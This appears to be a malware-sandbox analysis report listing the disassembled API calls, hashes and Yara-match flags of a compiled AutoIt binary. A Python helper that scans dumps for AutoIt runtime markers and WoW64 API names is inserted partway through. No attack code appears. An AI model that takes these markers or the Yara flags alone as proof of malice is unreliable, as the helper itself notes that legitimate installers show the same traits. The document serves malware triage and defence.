                                            • Part of subcall function 00DB2612: GetWindowLongW.USER32(?,000000EB), ref: 00DB2623
                                          • BeginPaint.USER32(?,?,?,?,?,?), ref: 00DB179A
                                          • GetWindowRect.USER32 ref: 00DB17FE
                                          • ScreenToClient.USER32 ref: 00DB181B
                                          • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00DB182C
                                          • EndPaint.USER32(?,?), ref: 00DB1876
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                          • String ID:
                                          • API String ID: 1827037458-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ShowWindow.USER32(00E757B0,00000000,01569100,?,?,00E757B0,?,00E3B5A8,?,?), ref: 00E3B712
                                          • EnableWindow.USER32(?,00000000), ref: 00E3B736
                                          • ShowWindow.USER32(00E757B0,00000000,01569100,?,?,00E757B0,?,00E3B5A8,?,?), ref: 00E3B796
                                          • ShowWindow.USER32(?,00000004,?,00E3B5A8,?,?), ref: 00E3B7A8
                                          • EnableWindow.USER32(?,00000001), ref: 00E3B7CC
                                          • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00E3B7EF
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: Window$Show$Enable$MessageSend
                                          • String ID:
                                          • API String ID: 642888154-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00DB12F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00DB134D
                                            • Part of subcall function 00DB12F3: SelectObject.GDI32(?,00000000), ref: 00DB135C
                                            • Part of subcall function 00DB12F3: BeginPath.GDI32(?), ref: 00DB1373
                                            • Part of subcall function 00DB12F3: SelectObject.GDI32(?,00000000), ref: 00DB139C
                                          • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00E3BED4
                                          • LineTo.GDI32(00000000,00000003,?), ref: 00E3BEE8
                                          • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00E3BEF6
                                          • LineTo.GDI32(00000000,00000000,?), ref: 00E3BF06
                                          • EndPath.GDI32(00000000), ref: 00E3BF16
                                          • StrokePath.GDI32(00000000), ref: 00E3BF26
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                          • String ID:
                                          • API String ID: 43455801-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00DD0193
                                          • MapVirtualKeyW.USER32(00000010,00000000), ref: 00DD019B
                                          • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00DD01A6
                                          • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00DD01B1
                                          • MapVirtualKeyW.USER32(00000011,00000000), ref: 00DD01B9
                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00DD01C1
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: Virtual
                                          • String ID:
                                          • API String ID: 4278518827-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • InterlockedExchange.KERNEL32(?,?), ref: 00E17243
                                          • EnterCriticalSection.KERNEL32(?,?,00DC0EE4,?,?), ref: 00E17254
                                          • TerminateThread.KERNEL32(00000000,000001F6,?,00DC0EE4,?,?), ref: 00E17261
                                          • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00DC0EE4,?,?), ref: 00E1726E
                                            • Part of subcall function 00E16C35: CloseHandle.KERNEL32(00000000,?,00E1727B,?,00DC0EE4,?,?), ref: 00E16C3F
                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 00E17281
                                          • LeaveCriticalSection.KERNEL32(?,?,00DC0EE4,?,?), ref: 00E17288
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                          • String ID:
                                          • API String ID: 3495660284-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • _memset.LIBCMT ref: 00E127C0
                                          • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00E127DC
                                          • DeleteMenu.USER32(?,00000007,00000000), ref: 00E12822
                                          • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00E75890,00000000), ref: 00E1286B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: Menu$Delete$InfoItem_memset
                                          • String ID: 0
                                          • API String ID: 1173514356-4108050209
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00DED3D7
                                            • Part of subcall function 00DB7BCC: _memmove.LIBCMT ref: 00DB7C06
                                          • _memset.LIBCMT ref: 00DB40FC
                                          • _wcscpy.LIBCMT ref: 00DB4150
                                          • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00DB4160
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                          • String ID: Line:
                                          • API String ID: 3942752672-1585850449
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                          • String ID:
                                          • API String ID: 1559183368-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • _malloc.LIBCMT ref: 00DE50EE
                                            • Part of subcall function 00DD571C: __FF_MSGBANNER.LIBCMT ref: 00DD5733
                                            • Part of subcall function 00DD571C: __NMSG_WRITE.LIBCMT ref: 00DD573A
                                            • Part of subcall function 00DD571C: RtlAllocateHeap.NTDLL(01550000,00000000,00000001,00000000,?,?,?,00DD0DD3,?), ref: 00DD575F
                                          • _free.LIBCMT ref: 00DE5101
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap_free_malloc
                                          • String ID:
                                          • API String ID: 1020059152-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00DB134D
                                          • SelectObject.GDI32(?,00000000), ref: 00DB135C
                                          • BeginPath.GDI32(?), ref: 00DB1373
                                          • SelectObject.GDI32(?,00000000), ref: 00DB139C
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: ObjectSelect$BeginCreatePath
                                          • String ID:
                                          • API String ID: 3225163088-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00E07BC6: RaiseException.KERNEL32(8007000E,?,00000000,00000000,?,00E07109,-C0000018,00000001,?,00E07044,80070057,?,?,?,00E07455), ref: 00E07BD3
                                          • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E07044,80070057,?,?,?,00E07455), ref: 00E07127
                                          • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E07044,80070057,?,?), ref: 00E07142
                                          • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E07044,80070057,?,?), ref: 00E07150
                                          • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E07044,80070057,?), ref: 00E07160
                                          • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E07044,80070057,?,?), ref: 00E0716C
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: From$Prog$ExceptionFreeRaiseStringTasklstrcmpi
                                          • String ID:
                                          • API String ID: 450394209-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00E15260
                                          • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00E1526E
                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00E15276
                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00E15280
                                          • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00E152BC
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: PerformanceQuery$CounterSleep$Frequency
                                          • String ID:
                                          • API String ID: 2833360925-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • EndPath.GDI32(?), ref: 00DB13BF
                                          • StrokeAndFillPath.GDI32(?,?,00DEB888,00000000,?), ref: 00DB13DB
                                          • SelectObject.GDI32(?,00000000), ref: 00DB13EE
                                          • DeleteObject.GDI32 ref: 00DB1401
                                          • StrokePath.GDI32(?), ref: 00DB141C
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          Similarity
                                          • API ID: Path$ObjectStroke$DeleteFillSelect
                                          • String ID:
                                          • API String ID: 2625713937-0
                                          • Opcode ID: f1968bcb4102b19dcca759ac737cb354d520fad9a42cc09bf49337b659070d4b
                                          • Instruction ID: cff76120c12bf28359b4b6ae0b3bb287364e1a5e0c65fcaf8c9caf9b1da4bf63
                                          • Opcode Fuzzy Hash: f1968bcb4102b19dcca759ac737cb354d520fad9a42cc09bf49337b659070d4b
                                          • Instruction Fuzzy Hash: F3F0FB36400A08DFEB199F1BED4C7983FA4E701326F4C8235E42A680B6C77045A9DF21
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          Similarity
                                          • API ID: _memset$_memmove
                                          • String ID: ERCP
                                          • API String ID: 2532777613-1384759551
                                          • Opcode ID: 14256f0007eeac9af060649ac0cb5a474b3d13f84d93a6a3544f666aa591379e
                                          • Instruction ID: 57611b972a0973aca7f4a723f5483638d761ca1b9f921ab28b09adc01eb3b623
                                          • Opcode Fuzzy Hash: 14256f0007eeac9af060649ac0cb5a474b3d13f84d93a6a3544f666aa591379e
                                          • Instruction Fuzzy Hash: E751A171900706DBDB24CFA5C981BAABBF4EF44314F24457EE44ADB291E770EA44CB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • __snwprintf.LIBCMT ref: 00E23A66
                                            • Part of subcall function 00DB7DE1: _memmove.LIBCMT ref: 00DB7E22
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          Similarity
                                          • API ID: __snwprintf_memmove
                                          • String ID: , $$AUTOITCALLVARIABLE%d$%
                                          • API String ID: 3506404897-3879706725
                                          • Opcode ID: 7ce91fc5ef0332fd371aa4614b66ada93da3832b771b64d9d235b8de6c23ad16
                                          • Instruction ID: 52fcca5ab5cf77c9c83a0f956eddb694606b264a9646c0b0c9947c60073f7ae8
                                          • Opcode Fuzzy Hash: 7ce91fc5ef0332fd371aa4614b66ada93da3832b771b64d9d235b8de6c23ad16
                                          • Instruction Fuzzy Hash: B9216F71A00219ABCF10EF64DC82AEEBBB5EF44740F501469F546BB181DB34EA45CB71
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00DB4BD0,?,00DB4DEF,?,00E752F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00DB4C11
                                          • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00DB4C23
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                          • API String ID: 2574300362-3689287502
                                          • Opcode ID: 71731b7c429144bb8257cd7ad292e274764a0b681b504f99d6786136b0504420
                                          • Instruction ID: 7df993e6873036f24d6ae4291da78876b6227a69beced0e3cde9e81f73564fe0
                                          • Opcode Fuzzy Hash: 71731b7c429144bb8257cd7ad292e274764a0b681b504f99d6786136b0504420
                                          • Instruction Fuzzy Hash: A1D01271911713CFD7209F71E90C647BED5EF09751F198C3AD486E6162E6B0D480C660
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00DB4B83,?), ref: 00DB4C44
                                          • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00DB4C56
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                          • API String ID: 2574300362-1355242751
                                          • Opcode ID: 9686e002c62543b3de971a023d845f48d1d58449cbddd305c88f90076d21f5cc
                                          • Instruction ID: 962828d5d4ca871932431df3a86fd32a0723afa6faf5ee17dbe5a11a0fbcece7
                                          • Opcode Fuzzy Hash: 9686e002c62543b3de971a023d845f48d1d58449cbddd305c88f90076d21f5cc
                                          • Instruction Fuzzy Hash: 43D01771A11713CFDB209F32E90D65ABBE4AF05791F15883AD896E6162E670D880CA60
                                          Uniqueness

                                          Uniqueness Score: -1.00%
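
The two LoadLibraryA/GetProcAddress entries above resolve Wow64DisableWow64FsRedirection and Wow64RevertWow64FsRedirection by name, and the strings ">>>AUTOIT NO CMDEXECUTE<<<" and "AUTOITCALLVARIABLE%d" that appear in the same code belong to the AutoIt3 interpreter runtime that every compiled AutoIt script embeds. The following Python triage helper is an added example, not part of this report and not Joe Sandbox's own signature logic: it scans a byte buffer (for instance one of the .sdmp memory dumps listed above, obtained separately) for those markers in ASCII and UTF-16LE form and returns a coarse label. The sample buffer, the marker list and the label names are constructed for the example. The caveat a practitioner should keep: these strings establish "compiled AutoIt" and "WoW64 file-system-redirection APIs resolved at run time", both of which plenty of legitimate installers also show, and are not evidence of malicious intent by themselves.

```python
"""Triage helper (added example; not part of the sandbox report and not
Joe Sandbox's own signature logic). Scans a byte buffer, e.g. a memory
dump such as the .sdmp files referenced in the report, for the AutoIt
runtime markers and the WoW64 API names seen in the disassembly entries,
in both ASCII and UTF-16LE form, and returns a coarse triage label."""

# Markers taken from the report entries. They are part of the AutoIt3
# interpreter runtime that every compiled AutoIt script carries, so a hit
# says "compiled AutoIt", not "malicious".
AUTOIT_MARKERS = (
    b">>>AUTOIT NO CMDEXECUTE<<<",
    b"AUTOITCALLVARIABLE%d",
)

# API names the runtime resolves at run time via LoadLibraryA +
# GetProcAddress (entries above). Resolving them by name keeps the binary
# loadable on 32-bit Windows that lacks WoW64, so on its own this is a
# weak signal that many legitimate installers also produce.
WOW64_API_NAMES = (
    b"Wow64DisableWow64FsRedirection",
    b"Wow64RevertWow64FsRedirection",
)


def _encodings(marker: bytes):
    """Yield the ASCII form and the UTF-16LE form of a marker."""
    yield marker
    yield marker.decode("ascii").encode("utf-16-le")


def find_markers(data: bytes) -> dict:
    """Map each marker (as str) to the list of buffer offsets where it occurs."""
    hits = {}
    for marker in AUTOIT_MARKERS + WOW64_API_NAMES:
        for needle in _encodings(marker):
            start = 0
            while True:
                idx = data.find(needle, start)
                if idx == -1:
                    break
                hits.setdefault(marker.decode("ascii"), []).append(idx)
                start = idx + 1
    return hits


def classify(hits: dict) -> str:
    """Coarse triage label (label names are an assumption of this example)."""
    has_autoit = any(m.decode("ascii") in hits for m in AUTOIT_MARKERS)
    has_wow64 = any(m.decode("ascii") in hits for m in WOW64_API_NAMES)
    if has_autoit:
        return "compiled-autoit"
    if has_wow64:
        return "wow64-redirection-by-name"
    return "no-markers"


# Constructed sample input: a fake dump embedding one ASCII marker, one
# UTF-16LE marker and one WoW64 API name between filler bytes.
SAMPLE_DUMP = (
    b"\x00" * 16
    + b">>>AUTOIT NO CMDEXECUTE<<<"
    + b"\x00" * 8
    + "AUTOITCALLVARIABLE%d".encode("utf-16-le")
    + b"\x00" * 8
    + b"Wow64DisableWow64FsRedirection"
    + b"\x00" * 16
)


def triage(data: bytes = SAMPLE_DUMP) -> tuple:
    """Return (label, hits) for a buffer; defaults to the constructed sample."""
    hits = find_markers(data)
    return classify(hits), hits


if __name__ == "__main__":
    import sys
    buf = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_DUMP
    label, found = triage(buf)
    print(label)
    for name, offsets in found.items():
        print(f"  {name}: {[hex(o) for o in offsets]}")
```

Run as `python triage.py <dump-or-pe-file>`; with no argument it scans the embedded sample. Offsets are positions inside the scanned buffer, so for a memory dump they must be combined with that dump's base before being compared with the ref: addresses in the entries.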

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c91f1fd45d31cb9359e52011b2f3b91833762f77e8c16e55149277680868106a
                                          • Instruction ID: 616d1c2cd0cdc07e555ebecb37ab38666baa1c505d19939ca6cd1846904f5a5a
                                          • Opcode Fuzzy Hash: c91f1fd45d31cb9359e52011b2f3b91833762f77e8c16e55149277680868106a
                                          • Instruction Fuzzy Hash: 29C17E74E04216EFDB14CFA4C884EAEBBB5FF48704B149598E895EB291D730ED81DB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          Similarity
                                          • API ID: Variant$AllocClearCopyInitString
                                          • String ID:
                                          • API String ID: 2808897238-0
                                          • Opcode ID: bccbc86c144b9dd60d3f9a568ba8f13f1255ae7f0ae8cf10b7e78e7ff0a88509
                                          • Instruction ID: 269096aa8a4f103912998eebdca4cb86090a10efac3c02cd9217bd44d210d57a
                                          • Opcode Fuzzy Hash: bccbc86c144b9dd60d3f9a568ba8f13f1255ae7f0ae8cf10b7e78e7ff0a88509
                                          • Instruction Fuzzy Hash: 0351AC747003029ADB24AF65D891BAAB7F5AF44314F20E81FE596FB6D1DB30D8E08721
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          Similarity
                                          • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                          • String ID:
                                          • API String ID: 2782032738-0
                                          • Opcode ID: c1f6e4d92acd1f3afe0024524b436ebcbba10f513d964a5c2ac3728707dc8c82
                                          • Instruction ID: 81cb74f4ccb4b633d0739555ed6c3bedb28d1c9c3220a0ec0ca84c8eb03c7a42
                                          • Opcode Fuzzy Hash: c1f6e4d92acd1f3afe0024524b436ebcbba10f513d964a5c2ac3728707dc8c82
                                          • Instruction Fuzzy Hash: 2E41B675A00745ABDF188EA9C8949AE77A6EF45360B28813FE45987740D770DD409BB0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00E388DE
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          Similarity
                                          • API ID: InvalidateRect
                                          • String ID:
                                          • API String ID: 634782764-0
                                          • Opcode ID: 54b3c764352b27e8444d0099e30c69cb0070c284e5f121d40a35c170879ab945
                                          • Instruction ID: 2a4071a74224086113acc9256a050f73f5906c4bbee38783f1dca1d045eaacf3
                                          • Opcode Fuzzy Hash: 54b3c764352b27e8444d0099e30c69cb0070c284e5f121d40a35c170879ab945
                                          • Instruction Fuzzy Hash: E131E330600308AFEB289A18CE4DBB87FB5EB85314FA45112FA59F61A1CA71A940D792
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ClientToScreen.USER32(?,?), ref: 00E3AB60
                                          • GetWindowRect.USER32 ref: 00E3ABD6
                                          • PtInRect.USER32(?,?,00E3C014), ref: 00E3ABE6
                                          • MessageBeep.USER32(00000000), ref: 00E3AC57
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          Similarity
                                          • API ID: Rect$BeepClientMessageScreenWindow
                                          • String ID:
                                          • API String ID: 1352109105-0
                                          • Opcode ID: e395914a7c43b07d89924c870b2a946a6c8b36213811582453d960cba9ff944b
                                          • Instruction ID: bfb4dd261b22eace17e5de427f54dbcbf51b38776de4a78969cea7efbdd2e736
                                          • Opcode Fuzzy Hash: e395914a7c43b07d89924c870b2a946a6c8b36213811582453d960cba9ff944b
                                          • Instruction Fuzzy Hash: 07418331A00119DFDF15DF59C888A99BFF6FF45300F1CA0B9E494AB261D730A885CB92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00DE61FB
                                          • __isleadbyte_l.LIBCMT ref: 00DE6229
                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00DE6257
                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00DE628D
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          Similarity
                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                          • String ID:
                                          • API String ID: 3058430110-0
                                          • Opcode ID: 042c22fc6bc400dd353252582f5aff1661323aea8c42c87252116f2a884cdf26
                                          • Instruction ID: 4ef651a8626ac0bc1d9be6af4d67dcc38b6e3f61c2802578e3543e286802139f
                                          • Opcode Fuzzy Hash: 042c22fc6bc400dd353252582f5aff1661323aea8c42c87252116f2a884cdf26
                                          • Instruction Fuzzy Hash: B531C030604286AFDF22AF76CC44BBA7FA9FF51390F194029E96497191D730E950D7A4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00DB2612: GetWindowLongW.USER32(?,000000EB), ref: 00DB2623
                                          • GetCursorPos.USER32(?,?,?,?,?,?,?,?,00DEB9AB,?,?,?,?,?), ref: 00E3C4D2
                                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00DEB9AB,?,?,?,?,?), ref: 00E3C4E7
                                          • GetCursorPos.USER32(?,?,?,?,?,?,?,?,?,00DEB9AB,?,?,?,?,?), ref: 00E3C534
                                          • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00DEB9AB,?,?,?), ref: 00E3C56E
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          Similarity
                                          • API ID: Cursor$LongMenuPopupProcTrackWindow
                                          • String ID:
                                          • API String ID: 2864067406-0
                                          • Opcode ID: 8083cf2ba0b89bb39542b47c8747395fe9852c9938e0b5d95ab9f9ecfdf1ff2e
                                          • Instruction ID: 907b27a2a862d1fb7b1e6510a29ba4ece5954def3d03af2706c6c4921b33878d
                                          • Opcode Fuzzy Hash: 8083cf2ba0b89bb39542b47c8747395fe9852c9938e0b5d95ab9f9ecfdf1ff2e
                                          • Instruction Fuzzy Hash: 4D318D36601058BFCB25CF59C858EEA7FB5EB49310F144069F90AAB261C731AD50DBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00DB2612: GetWindowLongW.USER32(?,000000EB), ref: 00DB2623
                                          • DefDlgProcW.USER32(?,00000020,?), ref: 00DB12D8
                                          • GetClientRect.USER32 ref: 00DEB5FB
                                          • GetCursorPos.USER32(?), ref: 00DEB605
                                          • ScreenToClient.USER32 ref: 00DEB610
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          Similarity
                                          • API ID: Client$CursorLongProcRectScreenWindow
                                          • String ID:
                                          • API String ID: 4127811313-0
                                          • Opcode ID: 8a91342a3b66ea5bc5a7221b07d6a59d5d042b25587d1e42e1c4f4a9fa556edb
                                          • Instruction ID: c7b35d4cbfdeefb6c6010954607cbcc10ed31acfe183de467fc2822ce254bfe7
                                          • Opcode Fuzzy Hash: 8a91342a3b66ea5bc5a7221b07d6a59d5d042b25587d1e42e1c4f4a9fa556edb
                                          • Instruction Fuzzy Hash: 5111193A900119EFCB04DF95D89A9EE7BB8EB05301F900466E942E7250C730AA558BB9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateWindowExW.USER32 ref: 00DB1D73
                                          • GetStockObject.GDI32(00000011), ref: 00DB1D87
                                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 00DB1D91
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          Similarity
                                          • API ID: CreateMessageObjectSendStockWindow
                                          • String ID:
                                          • API String ID: 3970641297-0
                                          • Opcode ID: 9fd0d0486db2e8923ded93d202dceb0eec767e1afca7210923dbae6cb7b11b4d
                                          • Instruction ID: eebb1de74f36e47da6132f3fa39aa5db2af3d8f02c97a29aa945e08174bdff1e
                                          • Opcode Fuzzy Hash: 9fd0d0486db2e8923ded93d202dceb0eec767e1afca7210923dbae6cb7b11b4d
                                          • Instruction Fuzzy Hash: 28118B72901618BFEF028F91DC55EEA7F69EF083A4F480126FA0562020C731DC64ABA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetWindowRect.USER32 ref: 00E3B2E4
                                          • ScreenToClient.USER32 ref: 00E3B2FC
                                          • ScreenToClient.USER32 ref: 00E3B320
                                          • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,00000000), ref: 00E3B33B
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          Similarity
                                          • API ID: ClientRectScreen$InvalidateWindow
                                          • String ID:
                                          • API String ID: 357397906-0
                                          • Opcode ID: 1d47292fef46f66a49fe161ea3e8ed6a34caa89acc15607f9ee0165b9c20b0f3
                                          • Instruction ID: 0dcbabd09f2f9162c97639778fb218f0ef9d62335c3bf0308d6971a417e182f1
                                          • Opcode Fuzzy Hash: 1d47292fef46f66a49fe161ea3e8ed6a34caa89acc15607f9ee0165b9c20b0f3
                                          • Instruction Fuzzy Hash: C41132B9D0060DAFDB41CFA9C8859EEBFB9FB08210F108166E915E2220D775AA558F91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00DB12F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00DB134D
                                            • Part of subcall function 00DB12F3: SelectObject.GDI32(?,00000000), ref: 00DB135C
                                            • Part of subcall function 00DB12F3: BeginPath.GDI32(?), ref: 00DB1373
                                            • Part of subcall function 00DB12F3: SelectObject.GDI32(?,00000000), ref: 00DB139C
                                          • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00E3BD40
                                          • LineTo.GDI32(00000000,?,?), ref: 00E3BD4D
                                          • EndPath.GDI32(00000000), ref: 00E3BD5D
                                          • StrokePath.GDI32(00000000), ref: 00E3BD6B
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          • Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp
